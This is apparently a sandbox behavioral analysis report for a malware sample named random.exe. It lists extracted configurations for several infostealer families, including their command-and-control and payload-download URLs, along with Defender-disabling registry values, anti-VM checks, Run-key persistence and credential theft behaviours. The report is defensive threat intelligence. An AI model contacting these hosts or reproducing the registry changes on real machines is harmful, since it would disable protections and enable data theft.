Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
07/03/2025, 17:54
Static task
static1
Behavioral task
behavioral1
Sample
random.exe
Resource
win7-20240903-en
General
-
Target
random.exe
-
Size
1.8MB
-
MD5
34a1010b4f6cf9c985d71453702602d7
-
SHA1
266541f9f120e4d4b79ebb5687bbe8a045281b6b
-
SHA256
ba83807eaf0091c523cc48c99735ae4d690996446a6018aef97f4c07f7529a09
-
SHA512
fdf1e61e69cb8c63dde682814f2fa0cf400c6ade91e5032eeeba21bf5c1623444bb76e48da312d40a5ad0d38910efbdfd798e8da9090a061a78d77c0f1eca89d
-
SSDEEP
49152:F8WzsvHzPOk2md5JvUHV7qA3aJuFi8/y:F8gcOZmFsJZ3kCin
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://dawtastream.bet/api
https://foresctwhispers.top/api
https://tracnquilforest.life/api
https://xcollapimga.fun/api
https://strawpeasaen.fun/api
https://jquietswtreams.life/api
https://starrynsightsky.icu/api
https://earthsymphzony.today/api
https://zfurrycomp.top/api
https://begindecafer.world/api
https://garagedrootz.top/api
https://modelshiverd.icu/api
https://larisechairedd.shop/api
https://catterjur.run/api
https://orangemyther.live/api
https://fostinjec.today/api
https://sterpickced.digital/api
https://defaulemot.run/api
https://arisechairedd.shop/api
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
stealc
traff1
-
url_path
/gtthfbsb2h.php
Signatures
-
Amadey family
-
Detect Poverty Stealer Payload 5 IoCs
resource yara_rule behavioral2/memory/5088-140-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral2/memory/5088-142-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral2/memory/5088-144-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral2/memory/5088-146-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral2/memory/5088-203-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer -
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral2/files/0x000c000000023df7-245.dat family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/2468-3357-0x0000000000220000-0x00000000004CC000-memory.dmp healer behavioral2/memory/2468-3356-0x0000000000220000-0x00000000004CC000-memory.dmp healer behavioral2/memory/2468-3451-0x0000000000220000-0x00000000004CC000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 4135398cf6.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 4135398cf6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 4135398cf6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 4135398cf6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 4135398cf6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 4135398cf6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 4135398cf6.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 4135398cf6.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 4135398cf6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 4135398cf6.exe -
Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
-
Povertystealer family
-
Stealc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 49afafb5a2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FR5MVRFWWK6EPYHEW9UM6Y.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bncn6rv.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempYSJNFD19HKLHBK5PBTCAD4Z2VMCPIAY8.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 17df09620c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 787a5f5ef6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8323f7acef.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ec6d990530.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4135398cf6.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 34 4168 powershell.exe 36 4696 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 216 powershell.exe 436 powershell.exe 4800 powershell.exe 2816 powershell.exe 4168 powershell.exe 4696 powershell.exe 7360 powershell.exe 216 powershell.exe 2816 powershell.exe 4488 powershell.exe 3504 powershell.exe 2732 powershell.exe 4128 powershell.exe -
Downloads MZ/PE file 29 IoCs
flow pid Process 365 4136 bncn6rv.exe 365 4136 bncn6rv.exe 365 4136 bncn6rv.exe 365 4136 bncn6rv.exe 365 4136 bncn6rv.exe 365 4136 bncn6rv.exe 365 4136 bncn6rv.exe 381 4924 rapes.exe 381 4924 rapes.exe 381 4924 rapes.exe 34 4168 powershell.exe 36 4696 powershell.exe 70 212 mIrI3a9.exe 177 7768 ec6d990530.exe 339 4924 rapes.exe 363 4924 rapes.exe 28 4924 rapes.exe 28 4924 rapes.exe 28 4924 rapes.exe 28 4924 rapes.exe 28 4924 rapes.exe 28 4924 rapes.exe 28 4924 rapes.exe 28 4924 rapes.exe 28 4924 rapes.exe 28 4924 rapes.exe 28 4924 rapes.exe 140 4452 BitLockerToGo.exe 158 4480 BitLockerToGo.exe -
Uses browser remote debugging 2 TTPs 21 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4168 chrome.exe 3632 chrome.exe 7212 chrome.exe 4116 chrome.exe 6100 chrome.exe 3840 msedge.exe 5156 msedge.exe 6588 chrome.exe 8072 chrome.exe 3052 msedge.exe 5360 msedge.exe 1824 msedge.exe 8120 chrome.exe 6228 chrome.exe 7784 msedge.exe 2220 chrome.exe 3068 chrome.exe 5976 msedge.exe 5244 msedge.exe 5748 msedge.exe 5164 msedge.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/files/0x00070000000245da-6492.dat net_reactor behavioral2/memory/8176-6500-0x0000000000A50000-0x0000000000AB0000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 32 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempYSJNFD19HKLHBK5PBTCAD4Z2VMCPIAY8.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FR5MVRFWWK6EPYHEW9UM6Y.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4135398cf6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 17df09620c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 787a5f5ef6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4135398cf6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8323f7acef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ec6d990530.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FR5MVRFWWK6EPYHEW9UM6Y.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 787a5f5ef6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bncn6rv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8323f7acef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ec6d990530.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 49afafb5a2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bncn6rv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempYSJNFD19HKLHBK5PBTCAD4Z2VMCPIAY8.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 17df09620c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 49afafb5a2.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation mIrI3a9.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation sqVWjvh.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation ADFoyxP.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation random.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 36 IoCs
pid Process 4924 rapes.exe 2736 7b5aced374.exe 1608 TempYSJNFD19HKLHBK5PBTCAD4Z2VMCPIAY8.EXE 4708 lk7ybIi.exe 2492 rapes.exe 2644 lk7ybIi.exe 5088 lk7ybIi.exe 212 mIrI3a9.exe 712 483d2fa8a0d53818306efeb32d3.exe 2632 sqVWjvh.exe 2568 17df09620c.exe 5488 8323f7acef.exe 6008 787a5f5ef6.exe 4236 3bd8e48c7d.exe 6116 3bd8e48c7d.exe 4816 a.exe 7768 ec6d990530.exe 8164 49afafb5a2.exe 5484 FR5MVRFWWK6EPYHEW9UM6Y.exe 6460 ae85dec50f.exe 2468 4135398cf6.exe 4236 sqVWjvh.exe 6480 rapes.exe 6796 PQkVDtx.exe 3892 COM Surrogate.exe 5312 packed.exe 4136 bncn6rv.exe 6056 COM Surrogate.exe 8176 mAtJWNv.exe 4320 mAtJWNv.exe 5192 HmngBpR.exe 7176 rapes.exe 7420 SplashWin.exe 4840 SplashWin.exe 3252 FvbuInU.exe 2444 ADFoyxP.exe -
Identifies Wine through registry keys 2 TTPs 16 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 17df09620c.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 8323f7acef.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine FvbuInU.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine TempYSJNFD19HKLHBK5PBTCAD4Z2VMCPIAY8.EXE Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine ec6d990530.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine FR5MVRFWWK6EPYHEW9UM6Y.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 4135398cf6.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine bncn6rv.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 787a5f5ef6.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 49afafb5a2.exe -
Loads dropped DLL 9 IoCs
pid Process 7420 SplashWin.exe 7420 SplashWin.exe 7420 SplashWin.exe 7420 SplashWin.exe 4840 SplashWin.exe 4840 SplashWin.exe 4840 SplashWin.exe 4136 bncn6rv.exe 4136 bncn6rv.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 4135398cf6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 4135398cf6.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Uninstall 43.053.0058.0001 = "C:\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.YourPhone_3wekyb108bbwe\\opt\\YourPhone.exe" COM Surrogate.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7b5aced374.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126980101\\7b5aced374.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126990121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ec6d990530.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10127880101\\ec6d990530.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\49afafb5a2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10127890101\\49afafb5a2.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ae85dec50f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10127900101\\ae85dec50f.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4135398cf6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10127910101\\4135398cf6.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 369 checkip.amazonaws.com 370 checkip.amazonaws.com 378 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023dd2-26.dat autoit_exe behavioral2/files/0x0011000000023c6b-2990.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
pid Process 1680 random.exe 4924 rapes.exe 1608 TempYSJNFD19HKLHBK5PBTCAD4Z2VMCPIAY8.EXE 2492 rapes.exe 712 483d2fa8a0d53818306efeb32d3.exe 2568 17df09620c.exe 5488 8323f7acef.exe 6008 787a5f5ef6.exe 7768 ec6d990530.exe 8164 49afafb5a2.exe 5484 FR5MVRFWWK6EPYHEW9UM6Y.exe 2468 4135398cf6.exe 6480 rapes.exe 4136 bncn6rv.exe 7176 rapes.exe 3252 FvbuInU.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 4708 set thread context of 5088 4708 lk7ybIi.exe 118 PID 2568 set thread context of 4452 2568 17df09620c.exe 168 PID 4236 set thread context of 6116 4236 3bd8e48c7d.exe 173 PID 5488 set thread context of 4480 5488 8323f7acef.exe 176 PID 8176 set thread context of 4320 8176 mAtJWNv.exe 266 PID 4840 set thread context of 5140 4840 SplashWin.exe 290 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\runtime\COM Surrogate.exe PQkVDtx.exe File created C:\Program Files\runtime\COM Surrogate.exe packed.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\PracticalPrevent ADFoyxP.exe File opened for modification C:\Windows\FilenameWho ADFoyxP.exe File opened for modification C:\Windows\UpdatedMakeup ADFoyxP.exe File created C:\Windows\Tasks\rapes.job random.exe File opened for modification C:\Windows\PerfectlyFda ADFoyxP.exe File opened for modification C:\Windows\AccreditationShed ADFoyxP.exe File opened for modification C:\Windows\GovernmentsHighly ADFoyxP.exe File opened for modification C:\Windows\HighKerry ADFoyxP.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 3476 4708 WerFault.exe 114 5312 4236 WerFault.exe 172 6324 8176 WerFault.exe 265 3060 4136 WerFault.exe 259 -
System Location Discovery: System Language Discovery 1 TTPs 63 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempYSJNFD19HKLHBK5PBTCAD4Z2VMCPIAY8.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lk7ybIi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mIrI3a9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language expand.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3bd8e48c7d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ec6d990530.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bncn6rv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8323f7acef.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage ae85dec50f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lk7ybIi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 17df09620c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 49afafb5a2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ae85dec50f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sqVWjvh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 787a5f5ef6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language ae85dec50f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7b5aced374.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4135398cf6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sqVWjvh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ADFoyxP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3bd8e48c7d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FR5MVRFWWK6EPYHEW9UM6Y.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe -
Checks processor information in registry 2 TTPs 22 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mAtJWNv.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString sqVWjvh.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 bncn6rv.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 sqVWjvh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried 